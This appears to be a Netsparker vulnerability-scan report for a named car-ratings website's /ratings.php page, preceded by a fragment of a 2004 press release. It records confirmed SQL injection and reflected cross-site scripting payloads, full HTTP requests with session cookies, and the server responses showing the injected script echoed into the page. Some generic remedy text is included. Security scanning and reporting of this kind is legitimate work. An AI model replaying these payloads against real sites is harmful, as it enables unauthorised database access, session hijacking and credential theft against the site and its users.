<!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Press Release</div> <br /> <div class="pagetext"> <div class="pagetitle_small">The 2004 Total Quality Awards�</div> <div class="boldtext" style="font-size: 14px; color:#777777;"><i>GM, Hyundai Score Big Says Strategic Vision</i></div> <p class="pagesubtitle">For immediate release - Monday, May 24, 2004</p> <p><a href="pdf/2011-06-29_V6.php" target="_blank">[Adobe PDF version available]</a></p> <p>San Diego -- General Motors is starting to deliver on its promise of better products, according to the people who buy them. The auto giant led in 11 of 19 segments (five ties) on Strategic Vision's 2004 Total Quality Index� (TQI), the San Diego-based research firm announced today.<br />
<br />
Among GM brands, Chevrolet led with four wins (1 a tie), followed by Cadillac (3 wins; 1 a tie), Saturn (tied in 2 segments) and Buick (tied in 1 segment). "GM has been saying for some time that's it's improving its products," says Strategic Vision vice president Daniel Gorrell, "so they should be proud that many of their buyers agree. The challenge will be to continue this momentum and regain the trust, and then the hearts and minds of the U.S. car and truck buyer."<br />
<br />
TQI, the premier measure of new vehicle owner satisfaction, assesses new buyers' responses to the complete ownership experience, including buying, owning and driving their new vehicles. The calculations also include the emotional response to that experience.<br />
<br />
In addition to the Santa Fe's repeat win in the small SUV segment, Hyundai's Elantra and Sonata were co-leaders in their segments. Nissan Motor also had three wins (2 were ties), two for Infiniti and one for Nissan. The other domestic manufacturers each had two wins, as did Honda (with one for each a tie). The Lexus 430 was Toyota's only top scorer.<br />
<br />
Infiniti and Mercedes Benz were the highest scoring brands, while Cadillac continued in second place, tying with Jaguar and Lexus. Mitsubishi and Dodge were the most improved brands. "The real challenge for GM and other brands who are turning their products around," says Gorrell, "is to convince potential buyers, particularly entrenched Toyota and Honda owners, to take a look."<br />
<br />
Buyers rated the following vehicles tops in their segments: (closely ranked scores, if the differences are not statistically significant, are considered ties)<br />
<br />
<hr noshade="noshade" size="1"><br />
<p><table border="0" cellpadding="5" cellspacing="0" width="100%" class="text"> <tr class="boldtext" bgcolor="#EEEEEE"><td>Segment</td><td>Winner(s)</td><td align="center">TQI Score</td></tr><tr> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=1">Small Car</a></td> <td valign="top">Hyundai Elantra<br />Saturn Ion</td> <td valign="top" align="center">867</td></tr><tr bgcolor="#EEEEEE"> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=2">Compact Car</a></td> <td valign="top">Chevrolet Malibu</td> <td valign="top" align="center">883</td></tr><tr> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=3">Compact Wagons</a></td> <td valign="top">Volkswagen Jetta Wagon</td> <td valign="top" align="center">840</td></tr><tr bgcolor="#EEEEEE"> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=4">Mid-Size Car</a></td> <td valign="top">Acura TSX</td> <td valign="top" align="center">888</td></tr><tr> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=5">Mid-Size Wagon</a></td> <td valign="top">Volkswagen Passat Wagon</td> <td valign="top" align="center">856</td></tr><tr bgcolor="#EEEEEE"> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=6">Larger Car</a></td> <td valign="top">Chrysler Concorde<br />Buick LeSabre</td> <td valign="top" align="center">851</td></tr><tr> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=7">Sporty Coupes Under $25,000</a></td> <td valign="top">Mini Cooper</td> <td valign="top" align="center">903</td></tr><tr bgcolor="#EEEEEE"> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=8">Sporty Coupes Over $25,000</a></td> <td valign="top">Chevrolet Corvette</td> <td valign="top" align="center">905</td></tr><tr> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=9">Mid-Specialty Car</a></td> <td valign="top">Chevrolet Monte Carlo</td> <td valign="top" align="center">885</td></tr><tr bgcolor="#EEEEEE"> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=10">Near Luxury Car</a></td> <td valign="top">Infiniti G35 Sedan</td> <td valign="top" align="center">900</td></tr><tr> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=11">Luxury/Sport Wagons</a></td> <td valign="top">Audi Allroad Quattro</td> <td valign="top" align="center">890</td></tr><tr bgcolor="#EEEEEE"> <td valign="top"&..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 2011
Make POST ' OR 'ns'='ns
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=098bd1vhc6te46dd5rso7uj730
Content-Length: 130
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=2011&Make='+OR+'ns'%3d'ns&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:51:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011" selected>2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option><option value="Acura">Acura</option><option value="Audi">Audi</option><option value="BMW">BMW</option><option value="Buick">Buick</option><option value="Cadillac">Cadillac</option><option value="Chevrolet">Chevrolet</option><option value="Chrysler">Chrysler</option><option value="Dodge">Dodge</option><option value="Ford">Ford</option><option value="GMC">GMC</option><option value="Honda">Honda</option><option value="Hyundai">Hyundai</option><option value="Infiniti">Infiniti</option><option value="Jaguar">Jaguar</option><option value="Jeep">Jeep</option><option value="Kia">Kia</option><option value="Land Rover">Land Rover</option><option value="Lexus">Lexus</option><option value="Lincoln">Lincoln</option><option value="Mazda">Mazda</option><option value="Mercedes-Benz">Mercedes-Benz</option><option value="Mercury">Mercury</option><option value="MINI">MINI</option><option value="Mitsubishi">Mitsubishi</option><option value="Nissan">Nissan</option><option value="Porsche">Porsche</option><option value="Ram">Ram</option><option value="Saab">Saab</option><option value="Scion">Scion</option><option value="Segment">Segment</option><option value="Subaru">Subaru</option><option value="Suzuki">Suzuki</option><option value="Toyota">Toyota</option><option value="Volkswagen">Volkswagen</option><option value="Volvo">Volvo</option></select></td><td><select name="Model" id="Model" onChange="submit();"><option>---</option><option value="1-Series Convertible">1-Series Convertible</option><option value="1-Series Coupe">1-Series Coupe</option><option value="1500">1500</option><option value="2">2</option><option value="2500/3500">2500/3500</option><option value="3 Hatchback">3 Hatchback</option><option value="3 Sedan">3 Sedan</option><option value="3-Series Convertible">3-Series Convertible</option><option value="3-Series Coupe">3-Series Coupe</option><option value="3-Series Sedan">3-Series Sedan</option><option value="300">300</option><option value="300C">300C</option><option value="300S">300S</option><option value="370Z Convertible">370Z Convertible</option><option value="370Z Coupe">370Z Coupe</option><option value="4Runner">4Runner</option><option value="5">5</option><option value="5-Series Sedan">5-Series Sedan</option><option value="6 Sedan">6 Sedan</option><option value="6-Series Convertible">6-Series Convertible</option><option value="6-Series Coupe">6-Series Coupe</option><option value="7-Series Hybrid Sedan">7-Series Hybrid Sedan</option><option value="7-Series Sedan">7-Series Se..
Cross-site Scripting

Cross-site Scripting

33 TOTAL
IMPORTANT
CONFIRMED
33
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 3
numCars POST '"--></style></script><script>alert(0x000899)</script>
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Content-Length: 190
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000899)%3c%2fscript%3e&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:40:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="'"--></style></script><script>netsparker(0x000899)</script>" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list"..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST '"--></style></script><script>alert(0x0008D0)</script>
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
